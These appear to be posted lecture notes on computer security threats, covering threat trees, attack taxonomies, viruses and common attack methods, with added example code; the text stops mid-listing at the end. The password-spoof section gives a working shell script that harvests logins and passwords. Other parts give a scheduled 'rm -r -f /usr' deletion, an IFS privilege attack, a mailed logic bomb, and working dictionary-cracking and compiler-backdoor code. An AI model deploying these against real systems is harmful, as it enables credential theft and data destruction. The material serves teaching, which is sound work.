Posted on 21-Dec-2015
Chapter 2
Threats To Computer Systems
2.1 Threats, Vulnerabilities and Attacks

Threat: any potential occurrence, malicious or otherwise, that can have an undesirable effect on the assets and resources associated with a computer system.

Vulnerability: some unfortunate characteristic of a system that makes it possible for a threat to occur.
Attack: an action taken by a malicious intruder that exploits one or more vulnerabilities in order to cause an existing threat to occur.
2.2 Types of Threats

Categorization is needed to establish a simple framework for understanding and solving security problems.

Three main types of threat:
- disclosure threat
- integrity threat
- denial of service threat
2.2.1 Disclosure threat

This threat involves the dissemination of information to an individual who should not see it. The information may be in computer storage or in transit between computer systems.
- Disclosure of information is called a "leak".
- This threat is especially important for organizations that handle confidential information, such as the military and government.
2.2.2 Integrity threat

This threat involves any unauthorized change to information stored on a computer system or in transit between computer systems.
- Unauthorized change to non-critical information has lesser consequences; change to critical information can be disastrous.
- This threat is especially important for battle plans and commercial activities.
2.2.3 Denial of service threat

This threat arises whenever access to some computer system resource is intentionally blocked as a result of malicious action taken by another user.
- It is critical where timing matters, for example delaying weapon deployment or stock dealing.
- Because the affected services are time-dependent, this threat is more difficult to address than the others.
2.3 System Security Engineering

To deal with the problems of threats, vulnerabilities and attacks, a discipline has recently emerged in the security community known as system security engineering. The security engineering process (Fig. 2.1) involves understanding the security problems and deriving protections against them.
Figure 2.1 System Security Engineering Process (flow diagram; the stages below are the boxes, and the loop is repeated until the risk is acceptably low):
1. Specify System Architecture
2. Identify Threats, Vulnerabilities, Attacks
3. Estimate Component Risk
4. Prioritize Vulnerabilities
5. Identify and Install Safeguards
6. Risk is Acceptably Low (exit condition)
Specify System Architecture
- Inspect the system: examine the network, hosts, interfaces and other associated architecture.
- Use a structural specification that includes the security methods currently in use.
- Include a description of the functional properties.
- Create a security priority list.
Identify Threats, Vulnerabilities, Attacks
- Identify potential threats from internal and external sources.
- Estimate the possible damage arising from an attack.
- Establish methodologies for minimizing the possibility of attack.
Estimate Component Risk
- Develop a risk formula.
- Identify the risk components.
- Prioritize the risk factors.
Prioritize Vulnerabilities
- Based on the risk priority developed in the previous stage, this stage provides an order for installing security protections.
- Because resources may be limited, the high-risk components are dealt with first.
Identify and Install Safeguards
- Identify all possible safeguard approaches, including standard security mechanisms.
- Examine the safeguard mechanisms with regard to minimal impact, performance degradation, cost and the resources needed.
2.4 Threat Tree

High-level threats serve as the starting point for further decomposition.
- Threat decomposition is based on a threat tree.
- The military standard MIL-STD 1785 is used.
- A threat tree is similar to the decision trees used in risk management and reliability engineering.
2.4.1 Arbitrary Threat List

Threats can be identified during system design or development. They can also be identified by a random, unstructured process called the arbitrary threat list process. The list can be enriched during the design, development and operation stages. However, most threats identified this way have some unfortunate characteristics.
Unfortunate Characteristics
- Dubious Completeness: it is difficult to be sure that all threats have been identified.
- Lack of Rationale: known threats are identified from past history, and the ad hoc nature of the list makes it difficult to give a rationale for each entry.
- Possible Inconsistencies: threats can be correlated and can co-occur, but the list treats them as independent events, so contradictory and redundant entries cannot be reconciled.
An arbitrary threat list should be avoided, especially for critical system missions. Developing a threat tree can overcome most of these shortfalls.
2.4.2 Developing a Threat Tree
- First identify a list of possible threats.
- Then introduce them in an iterative manner, refining the description carefully and gradually.
- The tree structure allows the various threats to be associated in a root-node relationship.
- This approach gives a rationale for each identified threat and simplifies the security solution.
2.4.3 Structure of a threat tree
- Each tree has a top node labelled Threat.
- Each label contains a generalized description of a threat present in the given system.
- Each child node is a sub-threat that represents a refinement of its parent node.
- The iterative process terminates when all threats and sub-threats are identified, i.e. the tree is complete.
Figure: Structure of a Threat Tree (a Threat node at the top with Sub-threat nodes beneath it).
Example: Hospital Computer System

The Hospital Computer System Threat (HCST) is composed of the Patient Medical Information (PMH) threat and the non Patient Medical Information (NPMH) threat. PMH can be further decomposed into Life Threatening (LT) and non Life Threatening (NLT), both of which are further decomposed into Disclosure (D), Integrity (I) and Denial of Service (DOS).
NPMH can be refined into the Billing threat (B) and the non Billing threat (NB). Both are further decomposed into Malicious Developer (MDEV) threats, introduced beforehand by a developer, and those that are not (NMDEV). A simplified threat tree for the hospital computer system is shown as follows:
Threat Tree of HCS

HCST
  PMH
    LT:  D, I, DOS
    NLT: D, I, DOS
  NPMH
    B:  MDEV, NMDEV
    NB: MDEV, NMDEV
Effects:
- D: confidential patient information is disclosed
- I: patient information is corrupted
- DOS: patient information is not available
- NMDEV (B): billing information is corrupted
- MDEV (NB): internal schedules are compromised
2.4.4 Using the Threat Tree to Support System Security Engineering

The threat tree provides a structured means for documenting and organizing the estimation and calculation of criticality, effort and risk factors.
- Criticality, or gain (G), defines the impact of the threat, equivalently the gain obtained by introducing security measures against it.
- Effort (E) defines the resources needed to resolve the threat.
- Risk (R = G/E) defines the normalized impact of the threat if it is realized.
Example of risk calculation using (G, E, R) values and maximum risk selection. Each node is annotated as name(G, E, R); a parent takes the (G, E, R) of the child with the highest R. The slide shows one set of D, I, DOS values and one set of MDEV, NMDEV values; they are placed here under LT and B, whose values they match.

HCST(8,2,4)
  PMH(8,2,4)
    LT(8,2,4): D(1,1,1), I(5,5,1), DOS(8,2,4)
    NLT(2,2,1)
  NPMH(2,1,2)
    B(2,1,2): MDEV(1,1,1), NMDEV(2,1,2)
    NB(1,1,1)
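To make the maximum-risk selection concrete, here is an added Python example (not from the lecture notes) that builds the hospital threat tree with the slide's (G, E) values, computes R = G/E at the leaves, propagates the highest-risk child up to each parent, and lists the leaf threats in the order in which the Prioritize Vulnerabilities stage of Section 2.3 would address them. The slide gives NLT and NB only as totals without their sub-threat values, so they are modelled here as leaves carrying those totals (an assumption).

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Added example: a threat tree whose leaves carry (G, E) and whose interior
# nodes inherit the (G, E, R) of their highest-risk child ("maximum risk
# selection"). Values below are the ones printed on the slide.


@dataclass
class Threat:
    name: str
    gain: Optional[float] = None    # G: criticality / gain from mitigating
    effort: Optional[float] = None  # E: resources needed to resolve
    children: List["Threat"] = field(default_factory=list)

    def risk(self) -> float:
        """R = G / E for a leaf node."""
        if self.gain is None or self.effort is None:
            raise ValueError(f"{self.name}: leaf without (G, E) values")
        if self.effort <= 0:
            raise ValueError(f"{self.name}: effort must be positive")
        return self.gain / self.effort


def evaluate(node: Threat) -> Tuple[float, float, float]:
    """(G, E, R) that a node carries: its own values for a leaf, otherwise
    the triple of the child with the highest R (ties keep tree order)."""
    if not node.children:
        return (node.gain, node.effort, node.risk())
    return max((evaluate(c) for c in node.children), key=lambda t: t[2])


def max_risk_path(node: Threat) -> List[str]:
    """Node names from the root down to the leaf that sets the root's risk."""
    path = [node.name]
    while node.children:
        node = max(node.children, key=lambda c: evaluate(c)[2])
        path.append(node.name)
    return path


def prioritized_leaves(node: Threat) -> List[Tuple[str, float]]:
    """All leaf threats by descending R: the order in which the
    Prioritize Vulnerabilities stage would install safeguards."""
    leaves: List[Tuple[str, float]] = []
    stack = [node]
    while stack:
        n = stack.pop()
        if n.children:
            stack.extend(n.children)
        else:
            leaves.append((n.name, n.risk()))
    return sorted(leaves, key=lambda t: -t[1])


def hospital_tree() -> Threat:
    """The slide's hospital computer system tree with its (G, E) values.
    NLT and NB appear on the slide only as totals, so they are leaves here
    (assumption); D/I/DOS sit under LT and MDEV/NMDEV under B."""
    lt = Threat("LT", children=[Threat("D", 1, 1), Threat("I", 5, 5),
                                Threat("DOS", 8, 2)])
    nlt = Threat("NLT", 2, 2)
    pmh = Threat("PMH", children=[lt, nlt])
    b = Threat("B", children=[Threat("MDEV", 1, 1), Threat("NMDEV", 2, 1)])
    nb = Threat("NB", 1, 1)
    npmh = Threat("NPMH", children=[b, nb])
    return Threat("HCST", children=[pmh, npmh])


if __name__ == "__main__":
    root = hospital_tree()
    print("HCST (G, E, R) =", evaluate(root))          # (8, 2, 4.0)
    print("max-risk path  =", " > ".join(max_risk_path(root)))
    for name, r in prioritized_leaves(root):
        print(f"{name:6s} R = {r}")
```

The path HCST > PMH > LT > DOS reproduces the (8, 2, 4) annotations on the slide, and the sorted leaf list is the input to the next stage: with limited resources, DOS under LT is dealt with first, then NMDEV under B.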
2.5 Categorization of Attack

"Computer crimes are probably the tip of an iceberg, but just how big the iceberg is, no one knows." T. Perry & P. Wallich
- Traditional three classes: disclosure, integrity and denial of service.
- Unclassified attacks: internet browsing, computation, storage and whatever else.
- To account for specific types of attack, taxonomies are used.
2.5.1 Using an Attack Taxonomy

An attack taxonomy is defined as any generalized categorization of the potential attacks that might occur on a given computer system. Attacks can be identified by informal analysis, documented by analytic means such as a threat tree, or drawn from reported experience with the target system.
Attack scenarios are sometimes identified for certain classes of systems, including real-time, database and LAN systems, and they must be dealt with appropriately in the target system at an early stage of security system development. Precise determination of the system and attack characteristics, and of their interaction with the environment, subsequently yields the final attack taxonomy by reducing the set of known attacks.
Figure: Using an Attack Taxonomy. The target system is shown together with the attacks on it that are selected from the attack taxonomy.

Figure: Reducing Known Attacks. Starting from an attack taxonomy with many known attacks, attacks are selected and mitigated, yielding an attack taxonomy with fewer known attacks; the select/mitigate step is repeated.
2.5.2 Considerations in Selecting an Attack Taxonomy

Completeness: the categories of attack should be accompanied by evidence that all potentially unfortunate occurrences in the target system have been accounted for. Each attack must be justifiable. However, because most attacks are unstructured and system dependent, empirical evidence is the strongest justification for completeness in an attack taxonomy.
Appropriateness: the selected attack taxonomy should appropriately characterize the attacks on the target system. Assumptions, such as that malicious insiders are not present, affect which attacks are appropriate. A trade-off is sometimes required between common, highly appropriate attacks and less appropriate attacks for the specified target system.

Internal vs. external threats: an attack taxonomy should differentiate between attacks from insiders and from outsiders. A taxonomy built for external attacks is sometimes entirely unsuitable for insider attacks.
2.5.3 Example - Simple Attack Taxonomy

Table with columns Operators, Programmers, Data Entry, Internal, Outside Intruders and one row per attack class. The cell entries as extracted from the slide, grouped by row:
- Physical Destruction: Bombing; Short Circuits
- Information Destruction: Erase disks; Malicious Software; Malicious Software; Via modem
- Data Diddling: Malicious Software; False Data Entry
- Theft of Services: Theft as user; Unauthorized Action; Via modem
- Browsing: Theft of Media; Unauthorized Action; Via modem
- Theft of Information: Unauthorized Action; Via modem
2.5.4 Example: Risk-based Empirical Attack Taxonomy

A simplified taxonomy cannot cater for the actual situation; an empirical taxonomy with reasonable justification can make it more complete. Possible empirical attacks:
- external information theft (glancing at someone's terminal)
- external abuse of resources (smashing a disk drive)
- masquerading (recording and playing back a network transmission)
- pest programs (installing a malicious program)
- bypassing authentication or authority (password cracking)
- authority abuse (falsifying records)
- abuse through inaction (intentionally bad administration)
- indirect abuse (using another system to create a malicious program)
External Information Theft

An unauthorized individual steals information, for example by glancing at another person's terminal to obtain sensitive information such as passwords, salary data or confidential documents. Avoid by setting up external procedures such as a secured terminal room, a secured printer, or paper shredders for discarding sensitive information.
External Abuse of Resources

This involves the physical destruction of hardware such as disk drives, circuit boards, communication media and so on.
- Because this is an attack on physical integrity, the attacker must have physical access to the resources but does not need access to the internal (logical) resources.
- Physical destruction may include vandalism and switching off the air conditioning or electrical power.
- Sometimes the abuse does not damage the hardware, as with jamming or tapping.
- Avoidance is by physical security means such as locks, guards, surveillance cameras and so on.
External Masquerading

This involves a malicious intruder successfully impersonating another user by means of some mechanism external to the computer system. An example is tapping the communication medium, recording the information transferred, and playing this information back at a later time. This attack has been used by network hackers to avoid being located. Avoidance is by setting up proper network security procedures, but the techniques are not straightforward.
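The notes leave the network procedures against record-and-playback unspecified. The following added Python example (mine, not from the notes) shows one standard check a receiver can apply to detect a replayed message: every message carries a timestamp, a one-time nonce and an HMAC over all three fields computed with a key shared between sender and receiver, and the receiver rejects a message whose MAC does not verify, whose timestamp is stale, or whose nonce it has already accepted. The key, the messages and the 30-second freshness window are constructed for the example.

```python
import hashlib
import hmac
import json
from typing import Dict, List, Tuple

# Added example: replay detection with timestamp + nonce + HMAC.
KEY = b"shared-secret-for-example-only"   # constructed; a real key is provisioned, not hard-coded
WINDOW_SECONDS = 30                        # how old a message may be and still be accepted


def tag(key: bytes, ts: int, nonce: str, payload: str) -> str:
    """HMAC-SHA256 over a canonical encoding of (timestamp, nonce, payload)."""
    msg = json.dumps([ts, nonce, payload], separators=(",", ":")).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_message(key: bytes, payload: str, ts: int, nonce: str) -> Dict:
    """What a legitimate sender transmits."""
    return {"ts": ts, "nonce": nonce, "payload": payload,
            "mac": tag(key, ts, nonce, payload)}


class Receiver:
    """Verifies MAC, freshness and nonce uniqueness. Nonces are remembered
    for the length of the freshness window, so a recorded message that is
    played back is rejected either as a duplicate nonce or as stale."""

    def __init__(self, key: bytes, window: int = WINDOW_SECONDS):
        self.key = key
        self.window = window
        self.seen: Dict[str, int] = {}   # nonce -> timestamp when first accepted

    def accept(self, msg: Dict, now: int) -> Tuple[bool, str]:
        expected = tag(self.key, msg["ts"], msg["nonce"], msg["payload"])
        if not hmac.compare_digest(expected, msg["mac"]):
            return False, "bad MAC (forged or modified)"
        if abs(now - msg["ts"]) > self.window:
            return False, "stale timestamp (possible delayed replay)"
        # forget nonces that have aged out of the window
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if msg["nonce"] in self.seen:
            return False, "nonce already used (replay)"
        self.seen[msg["nonce"]] = msg["ts"]
        return True, "ok"


def demo() -> List[Tuple[bool, str]]:
    """Constructed scenario: a genuine message, the same bytes played back
    immediately, the same bytes played back much later, and a tampered copy."""
    rx = Receiver(KEY)
    t0 = 1_700_000_000
    genuine = make_message(KEY, "transfer 100 to acct 42", t0, "n-0001")
    tampered = dict(genuine, payload="transfer 900 to acct 42")
    return [
        rx.accept(genuine, t0 + 1),     # (True, "ok")
        rx.accept(genuine, t0 + 2),     # replay inside the window: duplicate nonce
        rx.accept(genuine, t0 + 120),   # replay after the window: stale
        rx.accept(tampered, t0 + 3),    # modified payload: MAC fails
    ]


if __name__ == "__main__":
    for ok, why in demo():
        print("ACCEPT" if ok else "REJECT", why)
```

The point for the defender is that a MAC alone does not stop playback: the recorded message still verifies. Freshness (timestamp) and uniqueness (nonce) are what turn a replay into a detectable event, and the rejection reasons are what you would log.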
Pest Programs

These are attacks set up by malicious individuals to cause subsequent harm. A pest program can be viewed as a time bomb, i.e. the harm occurs at a much later time. This time lag may give the intruder an opportunity to cover tracks and avoid being caught immediately. Well-known types are Trojan horse and virus attacks. Countering pest programs requires secure internal controls, awareness broadcasting and possibly some shield programs.
Bypassing of Internal Controls

This involves the explicit avoidance of controls that are set up to protect the resources on a computer system. Bypassing usually refers to authorization, access and authority controls; the technique is based on clever use of some existing logical flaw in the system. Examples are the well-known password cracking techniques that subvert protective approaches containing flaws, and operating system and compiler attacks, which usually involve logical exploitation of flaws to bypass authority.
Active Authority Abuse

This attack occurs when an individual is trusted to perform some type of sensitive or important function and then actively abuses this privilege. Examples are falsifying certain data entries or granting services in an improper manner. Avoidance is difficult, but the risk can be minimized by personnel screening, background checks and even polygraph tests.
Abuse through Inaction

This involves the willful neglect of duty by some malicious individual. The attack occurs whenever some action is required to avoid a harmful situation but is not performed. An example is an administrator who neglects the maintenance of a system or recorder in order to cause degraded or denied service. Avoidance starts with identifying all possible inactions; this is the first step for any attack avoidance mechanism.
Indirect Abuse

This involves an off-line system and is characterized by behavior that may appear normal but is actually being carried out as a component or step in some more comprehensive attack. Example: factoring a large number on one system as a means of breaking a protection routine on another system. Avoidance is extremely difficult because the activity appears completely normal to the system being used.
2.6 Trojan Horses and Viruses

A program that performs an undesirable function behind a desirable one is called a Trojan Horse. A Trojan Horse that is able to reproduce itself and propagate across different computer systems is known as a virus.
2.6.1 Trojan Horses

A Trojan Horse program is defined as any program that is expected to perform some desirable function but that actually performs some unexpected and undesirable function. That is, a Trojan Horse program may look like a good program but can potentially turn harmful.
Example: the cat command in Unix. The figure contrasts a user running "cat x" with the normal version, which invokes the normal sequence of operating system routines, against "cat x" with a Trojan Horse version, which invokes a maliciously altered sequence of system routines.
Within a trusted group, a Trojan Horse is not critical: the trust allows co-workers to share information and resources, and the malicious program will not be created. However, if a Trojan Horse has infiltrated a trusted environment and can reproduce and propagate itself, it becomes a virus.
2.6.2 Viruses

A virus program is defined as any Trojan Horse program that has been designed to reproduce and propagate itself so as to modify other programs to include a possibly modified copy of the virus. As computer networks have become more widespread, the potential for huge propagation has increased and this type of attack has become serious.
The figure shows how a virus can be created as a Trojan Horse on one machine and then duplicated on others via some propagation means: Trojan Horse creation on System A; Trojan Horse duplication on System B (connected to System A) by electronic propagation; Trojan Horse duplication on System C (no connection to System A) by manual propagation.
2.6.3 Self-Reproducing Programs

A self-reproducing program is the key feature of a virus. This feature is created by the following steps:
1. declare a character string that corresponds to the main body of the program;
2. print each character of the defined string individually;
3. print the value of the array as a defined character string.
Example: self-reproducing program (the "…" in the array is elided in the notes; it stands for the character codes of the remaining program text, so the listing is not compilable as shown)

    #include <stdio.h>

    /* t holds the text of the program from the "0" that ends this initializer
     * to the final closing brace, one character per element, 0-terminated. */
    char t[] = {'0', ' ', '}', 'm', 'a', 'i', 'n', …, 't', ')', ';', '}', 0};

    int main(void)
    {
        int i;
        printf("char t[] = {");
        for (i = 0; t[i] != 0; i = i + 1)
            printf("%d, ", t[i]);   /* step 2: each character as a number */
        printf("%s", t);            /* step 3: the array as a string */
        return 0;
    }
Self-reproducing programs are so critical because they provide the basic means by which copies of a Trojan Horse can be produced automatically. Combining such copies with a compiler allows one to create as many copies of the Trojan Horse as one desires to compile. Insertion of additional code can cause damage when executed.
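As an added illustration of the three steps (mine, not the C program from the notes), the following Python program applies them with integer character codes, as the slide does, and adds the check that defines self-reproduction precisely: running the program must print exactly its own text, and running that output again must give the same text. Nothing here copies, installs or executes anything beyond the in-memory string; the point is to see what "self-reproducing" means so that the property can be recognized.

```python
import contextlib
import io

# Added example. Step 1: the main body of the program as a string. When run,
# the body prints the code array T (step 2, each character as a number) and
# then the array as a string (step 3).
BODY = 'print("T = " + str(T))\nprint("".join(map(chr, T)), end="")'


def quine_source() -> str:
    """Assemble the complete program: the array of character codes of BODY,
    followed by BODY itself."""
    codes = [ord(c) for c in BODY]
    return "T = " + str(codes) + "\n" + BODY


def run(source: str) -> str:
    """Execute Python source text in a fresh namespace and return exactly
    what it printed."""
    out = io.StringIO()
    with contextlib.redirect_stdout(out):
        exec(source, {})
    return out.getvalue()


def is_self_reproducing(source: str) -> bool:
    """A program reproduces itself when its output equals its own text."""
    return run(source) == source


if __name__ == "__main__":
    src = quine_source()
    print(src)
    print("# self-reproducing:", is_self_reproducing(src))
```

The first line of the generated program is the array T; its last two lines are the body. Because the body prints T from the values it was given and then decodes T back into the body, the output is the same text that was run, which is the fixed point the slide's C program aims at.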
2.6.4 Typical Virus Operation

Malicious intruders can initiate a virus attack by creating a program that does the following:
- finds a connected system and sends self-reproducing code via a remote copying command;
- initiates a remote compilation of the self-reproducing code via the remote execution command.
The process can repeat and affect other systems.
Figure: Virus Propagation, showing a Virus and two Duplicate Virus copies with the steps (1) send reproducing virus, (2) remotely execute virus, (3) send reproducing virus, (4) send reproducing virus.
Example: simple virus operation (pseudocode)

virus:
  while true do
    find_host (h);              /* locate a reachable system h */
    remote_copy (h, virus);     /* copy the virus's own code to h */
    perform_damage;             /* the payload */
    remote_execute (h, virus);  /* start the copy on h, which runs the same loop */
  od;
Example: Internet Virus (the 1988 Internet worm)
The first Internet virus was reported in November 1988. It was unleashed by a Cornell University graduate student, Robert T. Morris, and infected an estimated 6,000 of the roughly 60,000 hosts then connected to the Internet.
The virus exploited flaws in network services, abused trust relationships between hosts to copy and execute itself over TCP/IP, and cracked weak passwords to spread further.
The virus was analyzed and terminated by teams from MIT and Berkeley.
When caught, the designer claimed that he had made a programming mistake: the virus re-infected hosts far faster than intended, which is what made it so disruptive.
2.6.5 Trojan Horse Clues
The presence of a Trojan horse can be suspected from:
- Suspicious originator and distribution: choose reliable software/hardware manufacturers and distributors to avoid suspicious system components
- Unexpected size or other attributes: if a program's size or attributes become suspicious (for example a slow response time), the program needs to be investigated
- Undocumented origin and experience: malicious or incompetent sources are to be expected when a component's origin and track record are undocumented
2.7 Common Attack Methods
- Password spoof
- Password theft
- Logic bomb mail
- Scheduled file removal
- Field separator attack
- Insertion of compiler Trojan horse
2.7.1 Password Spoof Program
The first type of attack involves spoofing a user into believing that a computer terminal is correctly prompting that user for login and password information.
Normally a Trojan horse program is used to fake the normal login sequence that the user expects.
Properties of the spoofing program:
- the attacker gains physical access to the target individual's computer terminal
- the attacker logs onto the target system using whatever login and password are available to the attacker (if the attacker is an insider, these could be his own); with some changes to the procedure a different target computer can be used
- the Trojan horse spoof program is left running on the terminal for the target individual
Example: Unix-like command (Bourne shell spoof script left running on the terminal)

B1='ORIGIN: NODE whd1 MODULE 66 PORT 12'
B2='DESTINATION:'
FILE=$HOME/secure/suckers/fools
trap '' 1 2 3 5 15          # ignore HUP INT QUIT TRAP TERM so the victim cannot break out
echo "$B1"                  # imitate the real terminal banner
sleep 1
echo "$B2"
read dest
echo 'login: '
read login
stty -echo                  # hide the typed password, as the real login does
echo 'password: '
read password
stty echo
echo ''
echo "$login $password" >> "$FILE"   # record the captured credentials
echo 'login incorrect'               # make the victim believe a typo occurred
exec login                           # hand over to the real login so the retry succeeds
![Page 64: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/64.jpg)
Response (what the target sees on the terminal):

ORIGIN: NODE whd1 MODULE 66 PORT 12
DESTINATION: node/mysystem
login: abc
password: xxxxx
login incorrect
login: abc
password: xxxxx
$

The first login/password pair is recorded by the spoof program; the second is handled by the real login program, so the target sees nothing more than an apparent typing error.
![Page 65: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/65.jpg)
2.7.2 Password Theft by Clever Reasoning
Passwords are mnemonic and can often be guessed.
First guess: spouse's name, children's names, pet's name, license plate number, phone number, date of birth, date of marriage, favorite sports team, and so on
Second guess: easy-to-type keyboard patterns, e.g. "qaql"
![Page 66: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/66.jpg)
Last approach: attack on the password file and encryption function
- obtain a copy of the password file and of the encryption (hash) function
- obtain an electronic dictionary
- write a routine that encrypts every entry in the dictionary and compares the result with every entry in your copy of the password file
- any match reveals a valid password
Advantages: the intruder does not need to guess or infer the password directly, and the attack can be performed offline
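The offline dictionary attack just described, written out as an added example (this is not code from the slides or from Amoroso). The password file and dictionary are constructed, and the "$toy$" hash scheme (salted SHA-256) is a hypothetical stand-in for crypt(3) so that the example runs offline with the standard library. Grouping the stored entries by salt shows why salts exist: two users who share a salt cost the attacker one hash per dictionary word instead of two.

```python
import hashlib


def toy_hash(salt: str, password: str) -> str:
    """Hypothetical password-hashing function standing in for crypt(3)."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


def make_entry(user: str, salt: str, password: str) -> str:
    """Build one shadow-style line: user:$toy$salt$digest."""
    return f"{user}:$toy${salt}${toy_hash(salt, password)}"


# The intruder's copy of the password file (constructed data).
PASSWORD_FILE = "\n".join([
    make_entry("alice", "k7", "rover1990"),    # pet's name plus a year: a "first guess"
    make_entry("bob",   "q2", "Tr0ub4dor&3"),  # not in the dictionary
    make_entry("carol", "k7", "rover1990"),    # same salt and password as alice
])

# The intruder's electronic dictionary (constructed, deliberately tiny).
DICTIONARY = ["password", "qwerty", "letmein", "rover1990", "123456"]


def parse_password_file(text: str) -> list[tuple[str, str, str]]:
    """Return (user, salt, digest) for every line of a $toy$ password file."""
    entries = []
    for line in text.splitlines():
        user, field = line.split(":", 1)
        _empty, scheme, salt, digest = field.split("$")
        if scheme != "toy":
            raise ValueError(f"unsupported scheme {scheme!r} for {user}")
        entries.append((user, salt, digest))
    return entries


def dictionary_attack(text: str, words: list[str]) -> tuple[dict[str, str], int]:
    """Hash every dictionary word under every salt seen in the file and compare
    with the stored digests. Returns ({user: password}, number of hashes computed)."""
    # Group stored digests by salt: one hash per (salt, word) is compared
    # against every user who shares that salt. Unique per-user salts would
    # force one hash per (user, word) instead, which is what salts are for.
    by_salt: dict[str, dict[str, list[str]]] = {}
    for user, salt, digest in parse_password_file(text):
        by_salt.setdefault(salt, {}).setdefault(digest, []).append(user)

    cracked: dict[str, str] = {}
    hashes_computed = 0
    for salt, digests in by_salt.items():
        for word in words:
            hashes_computed += 1
            for user in digests.get(toy_hash(salt, word), []):
                cracked[user] = word
    return cracked, hashes_computed


if __name__ == "__main__":
    found, work = dictionary_attack(PASSWORD_FILE, DICTIONARY)
    print(f"{work} hashes computed, cracked: {found}")
```

With the constructed file, five dictionary words and two distinct salts cost ten hash computations and recover alice's and carol's password; bob's is not in the dictionary and survives. Per-user salts and a deliberately slow hash function are the defender's levers against exactly this loop.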
![Page 67: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/67.jpg)
2.7.3 Logic Bomb Mail
Logic bombs are programs that remain dormant until some predetermined logical condition on the target system becomes true.
Steps for setting up a logic bomb by mail:
- embed a command that removes all files (e.g. "rm") as an editor parameter in a file EDIT_ME
- mail EDIT_ME to your system administrator
- if the administrator does not open the file in the editor, it does no damage; otherwise the editor executes the embedded command and all files are erased
![Page 68: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/68.jpg)
2.7.4 Scheduled File Removal
A scheduler is used to run programs at a chosen time; on UNIX the "at" command is used.
Example: put the removal command in a file named attack and submit it to at:
  rm -r -f /usr
  at 0400 Sunday < attack
The job is stored in at's protected spool directory and, at 04:00 on Sunday, removes /usr recursively (-r) and without diagnostics (-f). Note that at runs a job once; recurring execution would be scheduled with cron instead.
![Page 69: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/69.jpg)
2.7.5 Field Separator Attack
This attack relies on several technical assumptions:
- field separators exist (the shell's IFS variable lists the characters that separate words)
- a privileged program or command exists that invokes a shell command
- the actual file name the administrator's program wants to execute is known
Steps to carry out the attack:
- redefine "/" as a field separator (IFS="/"), so the pathname "/foo/moo" is split into the words "foo" and "moo"
- knowing the administrator will use "sysprog" to run the file "/foo/moo", create a program called "foo" in a directory on the search path; "foo" hands the administrator's privileges to the intruder
- when "sysprog" is invoked, the shell runs "foo" (with "moo" as its argument) instead of "/foo/moo", and the attack is achieved
Caveat: modern shells apply IFS splitting only to the results of expansions, not to literal words in a command, so the attack as written does not work against them; the lasting lesson is that privileged programs must not trust inherited environment variables such as IFS and PATH when they invoke a shell.
2.7.6 Insertion of Compiler Trojan Horse
A compiler Trojan horse attack causes much more widespread damage, because every program the compiler builds can carry the Trojan horse.
Normal simplified compiler operation:
compile:
  get (line);
  translate (line);
The goal of the Trojan horse is to look for certain text patterns in the input programs the compiler translates and to insert code at those points.
Example:
compile:
  get (line);
  if line = 'read_pwd(p)' then
    translate (Trojan horse insertion);
  else
    translate (line);
  fi;
The Trojan horse may introduce a password backdoor that lets the intruder into the system with a common password such as "12345", even though the source code of the login program shows nothing of the kind.
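The compiler Trojan horse above, as an added example (not code from the slides or from Amoroso). The "compiler" is a hypothetical toy whose source language is a Python subset, so honest translation is line for line; the Trojan horse variant watches for the read_pwd( pattern from the slide and emits a backdoor line that the source never contained. The login routine and password store are constructed. The last function is the check a practitioner would want: compile the same source with an independent compiler and compare the outputs, since reviewing or hashing the source alone cannot reveal the insertion.

```python
import hashlib

BACKDOOR_PASSWORD = "12345"   # the "common password" from the text

# Constructed login routine that the administrator compiles and reviews.
LOGIN_SOURCE = """\
def login(user, p):
    expected = read_pwd(user)
    return p == expected
"""


def translate(line: str) -> str:
    """Honest translation of one source line (identity for this toy language)."""
    return line


def compile_clean(source: str) -> str:
    """compile: get(line); translate(line); for every line of the program."""
    return "\n".join(translate(line) for line in source.splitlines())


def compile_trojan(source: str) -> str:
    """Same loop, but after any line matching the read_pwd( pattern the compiler
    inserts a line that accepts BACKDOOR_PASSWORD before the real comparison."""
    out = []
    for line in source.splitlines():
        out.append(translate(line))
        if "read_pwd(" in line:
            indent = line[: len(line) - len(line.lstrip())]
            out.append(f"{indent}if p == {BACKDOOR_PASSWORD!r}: return True")
    return "\n".join(out)


def load_login(compiled: str, password_store: dict[str, str]):
    """'Run' the compiled program: bind read_pwd to a constructed password store
    and return the resulting login function."""
    namespace = {"read_pwd": lambda user: password_store[user]}
    exec(compiled, namespace)
    return namespace["login"]


def source_digest(source: str) -> str:
    """What a source review or signed-source check sees; it is the same whichever
    compiler is later used, which is why source inspection misses the attack."""
    return hashlib.sha256(source.encode()).hexdigest()


def compiler_outputs_differ(source: str) -> bool:
    """Detection: compile with a second, independently built compiler and diff the
    outputs. Here compile_clean plays the trusted second compiler."""
    return compile_clean(source) != compile_trojan(source)


PASSWORD_STORE = {"alice": "rover1990"}   # constructed

login_clean = load_login(compile_clean(LOGIN_SOURCE), PASSWORD_STORE)
login_trojan = load_login(compile_trojan(LOGIN_SOURCE), PASSWORD_STORE)

if __name__ == "__main__":
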